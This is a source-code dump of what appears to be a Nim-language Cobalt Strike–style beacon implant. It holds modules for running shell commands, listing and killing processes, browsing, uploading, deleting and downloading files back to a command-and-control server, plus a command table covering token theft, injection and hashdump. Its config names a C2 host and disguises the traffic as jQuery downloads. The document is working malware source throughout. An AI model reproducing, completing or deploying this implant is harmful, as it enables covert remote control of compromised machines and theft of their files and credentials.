 81 |                 return
 82 |     else:
 83 |         if CreateProcess(appStr, argsStr, nil, nil, inheritHandle, creationFlag, nil, nil, &si, &pi) == 0:
 84 |             dbg fmt"[-] CreateProcess error: {GetLastError()}, appstr:{appStr}, argsstr:{argsStr}"
 85 |             return
 86 | 
 87 |     dbg fmt"[+] Process created, PID: {pi.dwProcessId}"
 88 |     if use_pipe_output:
 89 |         dbg "[*] Reading output from pipe..."
 90 |         loop_read(pi.hProcess, hRPipe, CALLBACK_OUTPUT)
 91 |     
 92 |     defer:
 93 |         dbg "[*] Closing handles..."
 94 |         CloseHandle(hWPipe)
 95 |         CloseHandle(hRPipe) 
 96 |         return pi
 97 |         
 98 | proc loop_read*(handle, pipe: HANDLE, callback: callback_type) =
 99 |     var buf: seq[byte]
100 |     var count = 0
101 |     var exited = false
102 |     var pipe_buf: array[1024, char]
103 |     var bytesAvail, bytesRead: DWORD
104 | 
105 |     while true:
106 |         if WaitForSingleObject(handle, 0) == WAIT_OBJECT_0:
107 |             dbg "[*] Handle alerted"
108 |             exited = true
109 | 
110 |         if PeekNamedPipe(pipe, nil, 0, nil, &bytesAvail, nil) == 0:
111 |             dbg "[-] PeekNamedPipe error: " & $GetLastError()
112 |             return
113 | 
114 |         if bytesAvail == 0:
115 |             if not exited:
116 |                 dbg "[-] No data available in the pipe, wait"
117 |                 sleep(1000)
118 |                 continue
119 |             else:
120 |                 sleep(20000) # wait for output available?
121 |                 if PeekNamedPipe(pipe, nil, 0, nil, &bytesAvail, nil) == 0:
122 |                     dbg "[-] PeekNamedPipe error: " & $GetLastError()
123 |                     return
124 |                 if bytesAvail == 0:
125 |                     dbg "[-] No data available in the pipe, exit"
126 |                     break
127 | 
128 |         dbg "[*] Reading " & $bytesAvail & " bytes from the pipe..."          
129 |         count += 1
130 |         if ReadFile(pipe, &pipe_buf[0], sizeof(pipe_buf).DWORD, &bytesRead, nil) == 0:
131 |             var err = GetLastError()
132 |             if err != 233: # ERROR_PIPE_DISCONNECTED
133 |                 dbg "[-] ReadFile error: " & $GetLastError()
134 |             return
135 |         for p in pipe_buf[0..bytesRead-1]: buf.add(p.byte)
136 |         dbg "[*] Read from pipe: " & buf.toString
137 |         
138 |         # if callback is screenshot, send the buf in one time, otherwise send it separately
139 |         if callback != CALLBACK_SCREENSHOT:
140 |             push_result(callback, buf)
141 |             buf.delete(0..<buf.len)
142 | 
143 |     if callback != CALLBACK_SCREENSHOT:
144 |         if count >= 2:
145 |             push_result(callback, "---------output end---------".toSeq)
146 |     else:
147 |         push_result(callback, buf[4..<buf.len])
148 | 
149 | register_command(CMD_TYPE_SHELL, shell)
150 | register_command(CMD_TYPE_EXECUTE, exec)
151 | 
152 | 


--------------------------------------------------------------------------------
/cmd/types.nim:
--------------------------------------------------------------------------------
  1 | import std/[tables, endians, sequtils]
  2 | import ../utils
  3 | 
  4 | type 
  5 |     command_type* = range[1 .. 101]
  6 |     callback_type* = range[0 .. 32]
  7 |     command_result* = tuple[success: bool, message: string]
  8 | 
  9 | # defination from geacon_plus
 10 | const
 11 |     # cmd
 12 |     CMD_TYPE_SPAWN_IGNORE_TOKEN_X86*    = 1.command_type
 13 |     CMD_TYPE_EXIT*                      = 3.command_type
 14 |     CMD_TYPE_SLEEP*                     = 4.command_type
 15 |     CMD_TYPE_CD*                        = 5.command_type
 16 |     CMD_TYPE_DATA_JITTER*               = 6.command_type
 17 |     CMD_TYPE_CHECKIN*                   = 8.command_type
 18 |     CMD_TYPE_INJECT_X86*                = 9.command_type
 19 |     CMD_TYPE_UPLOAD_START*              = 10.command_type
 20 |     CMD_TYPE_DOWNLOAD*                  = 11.command_type
 21 |     CMD_TYPE_EXECUTE*                   = 12.command_type
 22 |     CMD_TYPE_SPAWN_TOX86*               = 13.command_type # only supply target, don't supply dll
 23 |     CMD_TYPE_CANCEL*                    = 19.command_type
 24 |     CMD_TYPE_GET_UID*                   = 27.command_type
 25 |     CMD_TYPE_REV2SELF*                  = 28.command_type
 26 |     CMD_TYPE_TIMESTOMP*                 = 29.command_type
 27 |     CMD_TYPE_STEAL_TOKEN*               = 31.command_type
 28 |     CMD_TYPE_PS*                        = 32.command_type
 29 |     CMD_TYPE_KILL*                      = 33.command_type
 30 |     CMD_TYPE_IMPORT_PS*                 = 37.command_type
 31 |     CMD_TYPE_RUNAS*                     = 38.command_type
 32 |     CMD_TYPE_PWD*                       = 39.command_type
 33 |     CMD_TYPE_JOB*                       = 40.command_type
 34 |     CMD_TYPE_LIST_JOBS*                 = 41.command_type
 35 |     CMD_TYPE_JOBKILL*                   = 42.command_type
 36 |     CMD_TYPE_INJECT_X64*                = 43.command_type
 37 |     CMD_TYPE_SPAWN_IGNORE_TOKEN_X64*    = 44.command_type
 38 |     CMD_TYPE_PAUSE*                     = 47.command_type
 39 |     CMD_TYPE_LIST_NETWORK*              = 48.command_type
 40 |     CMD_TYPE_MAKE_TOKEN*                = 49.command_type
 41 |     CMD_TYPE_PORT_FORWARD*              = 50.command_type
 42 |     CMD_TYPE_PORT_FORWARD_STOP*         = 51.command_type
 43 |     CMD_TYPE_FILE_BROWSE*               = 53.command_type
 44 |     CMD_TYPE_MAKEDIR*                   = 54.command_type
 45 |     CMD_TYPE_DRIVES*                    = 55.command_type
 46 |     CMD_TYPE_REMOVE*                    = 56.command_type
 47 |     CMD_TYPE_UPLOAD_LOOP*               = 67.command_type
 48 |     CMD_TYPE_SPAWN_TOX64*               = 69.command_type
 49 |     CMD_TYPE_EXEC_ASM_TOKEN_X86*        = 70.command_type
 50 |     CMD_TYPE_EXEC_ASM_TOKEN_X64*        = 71.command_type
 51 |     CMD_TYPE_SET_ENV*                   = 72.command_type
 52 |     CMD_TYPE_FILE_COPY*                 = 73.command_type
 53 |     CMD_TYPE_FILE_MOVE*                 = 74.command_type
 54 |     CMD_TYPE_GET_PRIVS*                 = 77.command_type
 55 |     CMD_TYPE_SHELL*                     = 78.command_type
 56 |     CMD_TYPE_WEB_DELIVERY*              = 79.command_type
 57 |     CMD_TYPE_EXEC_ASM_IGNORE_TOKEN_X86* = 87.command_type
 58 |     CMD_TYPE_EXEC_ASM_IGNORE_TOKEN_X64* = 88.command_type
 59 |     CMD_TYPE_SPAWN_TOKEN_X86*           = 89.command_type
 60 |     CMD_TYPE_SPAWN_TOKEN_X64*           = 90.command_type
 61 |     CMD_TYPE_GET_SYSTEM*                = 95.command_type
 62 |     CMD_TYPE_UNKNOWN_JOB*               = 101.command_type # same as 40 job?
 63 |     # callback
 64 |     CALLBACK_OUTPUT*            = 0.callback_type
 65 |     CALLBACK_KEYSTROKES*        = 1.callback_type
 66 |     CALLBACK_FILE*              = 2.callback_type
 67 |     CALLBACK_SCREENSHOT*        = 3.callback_type
 68 |     CALLBACK_CLOSE*             = 4.callback_type
 69 |     CALLBACK_READ*              = 5.callback_type
 70 |     CALLBACK_CONNECT*           = 6.callback_type
 71 |     CALLBACK_PING*              = 7.callback_type
 72 |     CALLBACK_FILE_WRITE*        = 8.callback_type
 73 |     CALLBACK_FILE_CLOSE*        = 9.callback_type
 74 |     CALLBACK_PIPE_OPEN*         = 10.callback_type
 75 |     CALLBACK_PIPE_CLOSE*        = 11.callback_type
 76 |     CALLBACK_PIPE_READ*         = 12.callback_type
 77 |     CALLBACK_POST_ERROR*        = 13.callback_type
 78 |     CALLBACK_PIPE_PING*         = 14.callback_type
 79 |     CALLBACK_TOKEN_STOLEN*      = 15.callback_type
 80 |     CALLBACK_TOKEN_GETUID*      = 16.callback_type
 81 |     CALLBACK_PROCESS_LIST*      = 17.callback_type
 82 |     CALLBACK_POST_REPLAY_ERROR* = 18.callback_type
 83 |     CALLBACK_PWD*               = 19.callback_type
 84 |     CALLBACK_LIST_JOBS*         = 20.callback_type
 85 |     CALLBACK_HASHDUMP*          = 21.callback_type
 86 |     CALLBACK_PENDING*           = 22.callback_type
 87 |     CALLBACK_ACCEPT*            = 23.callback_type
 88 |     CALLBACK_NETVIEW*           = 24.callback_type
 89 |     CALLBACK_PORTSCAN*          = 25.callback_type
 90 |     CALLBACK_DEAD*              = 26.callback_type
 91 |     CALLBACK_SSH_STATUS*        = 27.callback_type
 92 |     CALLBACK_CHUNK_ALLOCATE*    = 28.callback_type
 93 |     CALLBACK_CHUNK_SEND*        = 29.callback_type
 94 |     CALLBACK_OUTPUT_OEM*        = 30.callback_type
 95 |     CALLBACK_ERROR*             = 31.callback_type
 96 |     CALLBACK_OUTPUT_UTF8*       = 32.callback_type
 97 | 
 98 | var command_table* = initTable[command_type, proc (buf: var seq[byte], cmd: command_type)]()
 99 | proc register_command*(cmd_type: command_type, cmd: proc (buf: var seq[byte], cmd: command_type)) =
100 |     if command_table.hasKey(cmd_type):
101 |         dbg "[+] cmd: " & $cmd_type & "already registered"
102 |     else:
103 |         command_table[cmd_type] = cmd
104 | 
105 | proc parse_pending*(buf: var seq[byte]): int32 =
106 |     var pending: int32
107 |     var temp4: array[4, byte]
108 |     for i in 0..<4: temp4[i] = buf[i]
109 |     bigEndian32(addr pending, addr temp4)
110 |     buf = buf[4..<buf.len]
111 |     return pending
112 | 
113 | proc put_pending*(buf: var seq[byte], pending: int32) =
114 |     var temp4: array[4, byte]
115 |     bigEndian32(addr temp4, addr pending)
116 |     buf.insert(temp4, 0)
117 | 
118 | proc parse_once*(buf: var seq[byte]): seq[byte] =
119 |     var temp4: array[4, byte]
120 |     for i in 0..<4: temp4[i] = buf[i]
121 |     var arg_len: int32
122 |     bigEndian32(addr arg_len, addr temp4)
123 |     dbg "[+] arg len: " & $arg_len
124 | 
125 |     if arg_len == 0: return 
126 |     result = buf[4..<4+arg_len]
127 |     buf = buf[4+arg_len..<buf.len]
128 | 
129 | proc parse_multiple*(buf: var seq[byte], times: int): seq[seq[byte]] =
130 |     for i in 0..<times: 
131 |         result.add(parse_once(buf))
132 | 
133 | proc parse_int16*(buf: var seq[byte]): int16 =
134 |     var temp2: array[2, byte]
135 |     for i in 0..<2: temp2[i] = buf[i]
136 |     bigEndian16(result.addr, temp2.addr)
137 |     buf.delete(0..<2)
138 | 
139 | proc parse_int32*(buf: var seq[byte]): int32 =
140 |     var temp4: array[4, byte]
141 |     for i in 0..<4: temp4[i] = buf[i]
142 |     bigEndian32(result.addr, temp4.addr)
143 |     buf.delete(0..<4)
144 | 


--------------------------------------------------------------------------------
/cmd/windows/process.nim:
--------------------------------------------------------------------------------
  1 | import ../../[utils, meta]
  2 | import std/[os, strformat, endians]
  3 | import ../[types, result]
  4 | import winim
  5 | import winim/winstr
  6 | 
  7 | var system_info: SYSTEM_INFO
  8 | var system_info_initialized = false
  9 | 
 10 | # contribute to psutil-nim
 11 | proc pids*(): seq[int] = 
 12 |     ## Returns a list of PIDs currently running on the system.
 13 |     result = newSeq[int]()
 14 | 
 15 |     var procArray: seq[DWORD]
 16 |     var procArrayLen = 0
 17 |     # Stores the byte size of the returned array from enumprocesses
 18 |     var enumReturnSz: DWORD = 0
 19 | 
 20 |     while enumReturnSz == DWORD( procArrayLen * sizeof(DWORD) ):
 21 |         procArrayLen += 1024
 22 |         procArray = newSeq[DWORD](procArrayLen)
 23 | 
 24 |         if EnumProcesses( addr procArray[0], 
 25 |                           DWORD( procArrayLen * sizeof(DWORD) ), 
 26 |                           addr enumReturnSz ) == 0:
 27 |             return result
 28 | 
 29 |     # The number of elements is the returned size / size of each element
 30 |     let numberOfReturnedPIDs = int( int(enumReturnSz) / sizeof(DWORD) )
 31 |     for i in 0..<numberOfReturnedPIDs:
 32 |         result.add( procArray[i].int )
 33 | 
 34 | proc pid_name*(processID: int): string =
 35 |     #[
 36 |         function for getting the process name of pid
 37 |     ]#
 38 |     if processID == 0:
 39 |         return "System Idle Process"
 40 |     elif processID == 4:
 41 |         return "System"
 42 |     var szProcessName = newWideCString(MAX_PATH)
 43 |     var dwSize = MAX_PATH.DWORD
 44 | 
 45 |     var hProcess = OpenProcess( cast[DWORD](PROCESS_QUERY_LIMITED_INFORMATION), FALSE, cast[DWORD](processID) )
 46 |     defer: CloseHandle(hProcess)
 47 |     if hProcess == INVALID_HANDLE_VALUE:
 48 |         return ""
 49 |     
 50 |     if QueryFullProcessImageName(hProcess, 0, szProcessName, &dwSize) == 0:
 51 |         return ""
 52 | 
 53 |     var (_, name) = splitPath($szProcessName)
 54 |         
 55 |     return name
 56 | 
 57 | proc pid_user*(pid: int): string =
 58 | 
 59 |     ## Attempt to get the username associated with the given pid.
 60 |     var hProcess: HANDLE
 61 |     var hToken: HANDLE
 62 |     var pUser: ptr TOKEN_USER
 63 |     var peUse: SID_NAME_USE
 64 |     var dwUserLength = cast[DWORD](512)
 65 |     var dwDomainLength = cast[DWORD](512)
 66 |     var dwLength: DWORD
 67 |     var dwPid = cast[DWORD](pid)
 68 |     var wcUser = newWideCString(512)
 69 |     var wcDomain = newWideCString(512)
 70 | 
 71 |     hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid)
 72 |     if hProcess == cast[DWORD](-1) or hProcess == cast[DWORD](NULL):
 73 |         return ""
 74 | 
 75 |     if OpenProcessToken(hProcess, TOKEN_QUERY, cast[PHANDLE](hToken.addr)) == FALSE:
 76 |         dbg "[-] OpenProcessToken failed: " & $GetLastError() 
 77 |         return ""
 78 |     defer: CloseHandle(hProcess)
 79 | 
 80 |     if hToken == cast[HANDLE](-1) or hToken == cast[HANDLE](NULL):
 81 |         dbg "[-] Token handle is NULL: " & $GetLastError()
 82 |         return ""
 83 |     defer: CloseHandle(hToken)
 84 | 
 85 |     pUser = cast[ptr TOKEN_USER](alloc(50))
 86 |     defer: dealloc(pUser)
 87 |     ## Get required buffer size and allocate the TOKEN_USER buffer
 88 |     GetTokenInformation(hToken, tokenUser, pUser, cast[DWORD](0), cast[PDWORD](dwLength.addr))
 89 |     GetTokenInformation(hToken, tokenUser, pUser, cast[DWORD](dwLength), cast[PDWORD](dwLength.addr))
 90 |     
 91 |     if LookupAccountSidW(cast[LPCWSTR](NULL), pUser.User.Sid, wcUser, dwUserLength.addr, wcDomain, dwDomainLength.addr, peUse.addr) == FALSE:
 92 |         dbg fmt"{wcUser}, {dwUserLength}, {wcDomain}, {dwDomainLength}, {peUse}"
 93 |         dbg "[-] LookupAccountSidW failed: " & $GetLastError() 
 94 |         return ""
 95 | 
 96 |     return $wcUser
 97 | 
 98 | proc pid_parent*(pid: int): int =
 99 |     var h: HANDLE
100 |     var pe: PROCESSENTRY32
101 |     var ppid = cast[DWORD](0)
102 |     pe.dwSize = cast[DWORD](sizeof(PROCESSENTRY32))
103 |     h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
104 |     defer: CloseHandle(h)
105 |     if Process32First(h, pe.addr):
106 |         while Process32Next(h, pe.addr):
107 |             if cast[int](pe.th32ProcessID) == pid:
108 |                 ppid = pe.th32ParentProcessID
109 |                 break
110 |     
111 |     return cast[int](ppid)
112 | 
113 | proc pid_session_id*(pid: int): int =
114 |     var sessionId: DWORD = 0
115 |     ProcessIdToSessionId(cast[DWORD](pid), sessionId.addr)
116 |     return cast[int](sessionId)
117 | 
118 | proc pid_arch*(pid: int): string =
119 |     if not system_info_initialized:
120 |         GetNativeSystemInfo(system_info.addr)
121 |     var hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, cast[DWORD](pid))
122 |     defer: CloseHandle(hProcess)
123 | 
124 |     var wow64: BOOL = 0
125 |     IsWow64Process(hProcess, wow64.addr)
126 | 
127 |     case system_info.wProcessorArchitecture
128 |     of PROCESSOR_ARCHITECTURE_ARM: return "arm"
129 |     of PROCESSOR_ARCHITECTURE_INTEL: return "x86"
130 |     of PROCESSOR_ARCHITECTURE_UNKNOWN: return "Unknown"
131 |     of PROCESSOR_ARCHITECTURE_AMD64: 
132 |         if wow64 == TRUE: return "x86"
133 |         else: return "x64"
134 |     of 12: # PROCESSOR_ARCHITECTURE_ARM64, contribute to winim
135 |         if wow64 == TRUE: return "arm"
136 |         else: return "arm64"
137 |     of PROCESSOR_ARCHITECTURE_IA64:
138 |         if wow64 == TRUE: return "x86"
139 |         else: return "ia64"
140 |     else: return "Unknown"
141 | 
142 | proc ps(buf: var seq[byte], cmd: command_type) = 
143 |     var pending = parse_pending(buf)
144 |     var total = ""
145 | 
146 |     for pid in pids():
147 |         var name = pid_name(pid)
148 |         var ppid = pid_parent(pid)
149 |         var arch = pid_arch(pid)
150 |         var owner = pid_user(pid)
151 |         var session_id = pid_session_id(pid)
152 |         total = &"{total}\n{name}\t{ppid}\t{pid}\t{arch}\t{owner}\t{session_id}"
153 |     
154 |     dbg "[+] total: " & total
155 |     put_pending(buf, pending)
156 |     buf.add(total.toSeq)
157 | 
158 |     if pending == 0:
159 |         push_result(CALLBACK_PROCESS_LIST, buf)
160 |     else:
161 |         push_result(CALLBACK_PENDING, buf)
162 | 
163 | proc kill(buf: var seq[byte], cmd: command_type) = 
164 |     when not defined(windows):
165 |         push_result(CALLBACK_OUTPUT, "only suppported on windows".toSeq)
166 |         return
167 |     
168 |     var pid: uint32
169 |     var temp4: array[4, byte]
170 |     for i in 0..<4: temp4[i] = buf[i]
171 |     bigEndian32(addr pid, addr temp4)
172 |     
173 |     dbg "[+] kill pid: " & $pid
174 |     var hProcess = OpenProcess(PROCESS_TERMINATE.DWORD, FALSE.WINBOOL, pid.DWORD)
175 |     if hProcess == cast[HANDLE](-1) or hProcess == cast[HANDLE](NULL):
176 |         push_result(CALLBACK_OUTPUT, "failed to open process".toSeq)
177 |         return
178 |     defer: CloseHandle(hProcess)
179 |     if TerminateProcess(hProcess, 0) == FALSE:
180 |         push_result(CALLBACK_OUTPUT, "failed to terminate process".toSeq)
181 |         return
182 |     push_result(CALLBACK_OUTPUT, (&"process {pid} killed").toSeq)
183 | 
184 | register_command(CMD_TYPE_PS, ps)
185 | register_command(CMD_TYPE_KILL, kill)


--------------------------------------------------------------------------------
/cmd/fs.nim:
--------------------------------------------------------------------------------
  1 | import std/[os, strutils, sequtils, times, streams, endians, tables]
  2 | import ../[utils, config]
  3 | import types, result
  4 | when defined(windows):
  5 |     import winim
  6 | 
  7 | var fileCounter: int32 = 0
  8 | var cancelTable = initTable[int32, bool]()
  9 | 
 10 | proc cd(buf: var seq[byte], cmd: command_type) = 
 11 |     try:
 12 |         setCurrentDir(buf.toString.replace("\\", "/"))
 13 |         dbg "[+] current dir: " & getCurrentDir()
 14 |     except OSError:
 15 |         dbg "[-] failed to change dir: " & buf.toString
 16 |     return
 17 | 
 18 | proc pwd(buf: var seq[byte], cmd: command_type) = 
 19 |     try:
 20 |         var dir = getCurrentDir()
 21 |         push_result(CALLBACK_PWD, dir.toSeq)
 22 |     except OSError:
 23 |         dbg "[-] failed to get current dir"
 24 |     return
 25 | 
 26 | proc mkdir(buf: var seq[byte], cmd: command_type) =
 27 |     var dir = buf.toString.replace("\\", "/")
 28 |     try:
 29 |         createDir(dir)
 30 |         dbg "[+] created dir: " & dir
 31 |     except OSError:
 32 |         dbg "[-] failed to create dir: " & dir
 33 |     return
 34 | 
 35 | proc cp(buf: var seq[byte], cmd: command_type) =
 36 |     var args = parse_multiple(buf, 2)
 37 |     var src = args[0].toString.replace("\\", "/")
 38 |     var dst = args[1].toString.replace("\\", "/")
 39 |     try:
 40 |         copyFile(src, dst)
 41 |         dbg "[+] copied file: " & src & " to " & dst
 42 |         push_result(CALLBACK_OUTPUT, "copy success".toSeq)
 43 |     except OSError:
 44 |         dbg "[-] failed to copy file: " & src & " to " & dst
 45 | 
 46 | proc mv(buf: var seq[byte], cmd: command_type) =
 47 |     var args = parse_multiple(buf, 2)
 48 |     var src = args[0].toString.replace("\\", "/")
 49 |     var dst = args[1].toString.replace("\\", "/")
 50 |     try:
 51 |         moveFile(src, dst)
 52 |         dbg "[+] moved file: " & src & " to " & dst
 53 |         push_result(CALLBACK_OUTPUT, "move success".toSeq)
 54 |     except OSError:
 55 |         dbg "[-] failed to move file: " & src & " to " & dst
 56 | 
 57 | proc rm(buf: var seq[byte], cmd: command_type) =
 58 |     var path = buf.toString.replace("\\", "/")
 59 |     try:
 60 |         if fileExists(path):
 61 |             removeFile(path)
 62 |             dbg "[+] removed file: " & path
 63 |             push_result(CALLBACK_OUTPUT, "remove success".toSeq)
 64 |         elif dirExists(path):
 65 |             removeDir(path)
 66 |             dbg "[+] removed dir: " & path
 67 |             push_result(CALLBACK_OUTPUT, "remove success".toSeq)
 68 |         else:
 69 |             push_result(CALLBACK_OUTPUT, "file or dir not found".toSeq)
 70 |     except OSError:
 71 |         dbg "[-] failed to remove file: " & path
 72 | 
 73 | proc ls(buf: var seq[byte], cmd: command_type) =
 74 |     var pending = parse_pending(buf)
 75 |     dbg "[+] pending: " & $pending
 76 |     var path = parse_once(buf).toString.replace("\\", "/")
 77 | 
 78 |     var total = ""
 79 |     for path in walkPattern(path).toSeq:
 80 |         var info: FileInfo
 81 |         try:
 82 |             info = getFileInfo(path)
 83 |         except OSError:
 84 |             dbg "[-] failed to get file info: " & path
 85 |             continue
 86 |         case info.kind
 87 |         of pcFile: total = total & "F"
 88 |         of pcDir: total = total & "D"
 89 |         else: total = total & "?"
 90 |         
 91 |         var p = splitPath(absolutePath(path))
 92 |         var timestr = info.lastWriteTime.format("dd/MM/yyyy HH:mm:ss")
 93 |         total = total & "\t" & $info.size & "\t" & timestr & "\t" & p.tail  & "\n"
 94 | 
 95 |     removeSuffix(path, "/*")
 96 |     var timestr = "00/00/0000 00:00:00"
 97 |     try:
 98 |         timestr = getFileInfo(path).lastWriteTime.format("dd/MM/yyyy HH:mm:ss")
 99 |     except OSError:
100 |         dbg "[-] failed to get file info: " & path
101 |     total = "D\t0\t" & timestr & "\t..\n" & total
102 |     total = "D\t0\t" & timestr & "\t.\n" & total
103 |     total = absolutePath(path).replace("/", "\\") & "\\*" & "\n" & total
104 |     
105 |     dbg "[+] total: " & total
106 |     var res_bytes = total.toSeq
107 |     put_pending(res_bytes, pending)
108 |     push_result(CALLBACK_PENDING, res_bytes)
109 | 
110 | proc download(buf: var seq[byte], cmd: command_type) =
111 |     var temp4: array[4, byte]
112 | 
113 |     var path = buf.toString.replace("\\", "/")
114 |     var request_id = fileCounter
115 |     fileCounter += 1
116 |     var info = getFileInfo(path)
117 |     var file_size = info.size.int32
118 |     
119 |     var file_reply: seq[byte]
120 |     bigEndian32(addr temp4, addr request_id)
121 |     file_reply.add(temp4)
122 |     bigEndian32(addr temp4, addr file_size)
123 |     file_reply.add(temp4)
124 |     file_reply.add(path.toSeq)
125 |     
126 |     push_result(CALLBACK_FILE, file_reply)
127 | 
128 |     cancelTable[request_id] = false
129 |     var strm = newFileStream(path, fmRead)
130 |     
131 |     var read_ok = false
132 |     while not read_ok and not cancelTable[request_id]:
133 |         # NOTICE: large download_size causes overflow? makes beacon exit unexpectly, larger stack may fix this
134 |         var buffer: array[download_size, byte]
135 |         var read = strm.readData(buffer.addr, download_size)
136 |         dbg "[+] read: " & $read & ", buffer: " & repr(buffer)
137 |         file_reply = buffer.toSeq[0..<read]
138 |         if read < download_size: read_ok = true
139 | 
140 |         bigEndian32(addr temp4, addr request_id)
141 |         file_reply.insert(temp4, 0)
142 |         push_result(CALLBACK_FILE_WRITE, file_reply)
143 |         sleep(wait_time)
144 |     
145 |     strm.close()
146 |     bigEndian32(addr temp4, addr request_id)
147 |     push_result(CALLBACK_FILE_CLOSE, temp4.toSeq)
148 | 
149 | proc cancel_download(buf: var seq[byte], cmd: command_type) =
150 |     var request_id: int32
151 |     bigEndian32(addr request_id, addr buf)
152 |     cancelTable[request_id] = true
153 | 
154 | proc upload(buf: var seq[byte], cmd: command_type) =
155 |     var path = parse_once(buf).toString.replace("\\", "/")
156 |     var content: array[download_size, byte]
157 |     var strm = newFileStream(path, fmAppend)
158 |     var writelen = 0
159 |     while buf.len > 0:
160 |         if buf.len < download_size: writelen = buf.len
161 |         else: writelen = download_size
162 |         for i in 0..<writelen: content[i] = buf[i]
163 |         strm.writeData(content.addr, writelen)
164 |         buf = buf[writelen..<buf.len]
165 |     strm.close()
166 | 
167 | proc list_drives(buf: var seq[byte], cmd: command_type) =
168 |     when not defined(windows):
169 |         push_result(CALLBACK_OUTPUT, "only suppported on windows".toSeq)
170 |         return
171 |     var drives = repr(GetLogicalDrives().uint32).toSeq
172 |     buf = buf[0..<4]
173 |     buf.add(drives)
174 |     push_result(CALLBACK_PENDING, buf)    
175 | 
176 | proc time_stomp(buf: var seq[byte], cmd: command_type) =
177 |     when not defined(windows):
178 |         push_result(CALLBACK_OUTPUT, "only suppported on windows".toSeq)
179 |         return
180 |     # todo
181 |     var args = parse_multiple(buf, 2)
182 |     var to = args[0].toString
183 |     var fr = args[1].toString
184 |     dbg "[+] to: " & to & ", from: " & fr
185 | 
186 | register_command(CMD_TYPE_CD, cd)
187 | register_command(CMD_TYPE_PWD, pwd)
188 | register_command(CMD_TYPE_MAKEDIR, mkdir)
189 | register_command(CMD_TYPE_FILE_COPY, cp)
190 | register_command(CMD_TYPE_FILE_MOVE, mv)
191 | register_command(CMD_TYPE_REMOVE, rm)
192 | register_command(CMD_TYPE_FILE_BROWSE, ls)
193 | register_command(CMD_TYPE_DOWNLOAD, download)
194 | register_command(CMD_TYPE_CANCEL, cancel_download)
195 | register_command(CMD_TYPE_UPLOAD_START, upload)
196 | register_command(CMD_TYPE_UPLOAD_LOOP, upload)
197 | register_command(CMD_TYPE_DRIVES, list_drives)
198 | register_command(CMD_TYPE_TIMESTOMP, time_stomp)
199 | 


--------------------------------------------------------------------------------
/config.nim:
--------------------------------------------------------------------------------
 1 | const
 2 |     # encryption
 3 |     rsa_public_key* = """-----BEGIN PUBLIC KEY-----
 4 | -----END PUBLIC KEY-----"""
 5 |     rsa_private_key* = """-----BEGIN PRIVATE KEY-----
 6 | -----END PRIVATE KEY-----"""
 7 | 
 8 |     # c2
 9 |     protocol* = "smtp://" # http://, https://, dns:// or smtp://
10 |     host* = "192.168.65.1"
11 |     port* = "25"
12 | 
13 |     # check in
14 |     check_in_max_retries* = 1
15 |     sleep_interval* = 5*1000
16 | 
17 |     # c2profile
18 |     http_timeout* = 30000
19 |     http_proxy_url* = ""
20 |     http_host_name* = ""
21 | 
22 |     http_headers*: seq[tuple[key: string, value: string]] = @[
23 |         ("User-Agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUS)"),
24 |         ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
25 |         ("Referer", "https://code.jquery.com/"),
26 |         ("Accept-Encoding", "gzip, deflate")
27 |     ]
28 | 
29 |     get_endpoints*: array[0..0, string] = ["/jquery-3.3.1.min.js"]
30 | 
31 |     get_meta_encrypt_type* = ["mask", "base64url"]
32 |     get_client_prepend* = "__cfduid="
33 |     get_client_append* = ""
34 |     meta_data_field_type* = "header"
35 |     meta_data_field* = "Cookie"
36 | 
37 |     get_server_prepend* = "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */" & "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var 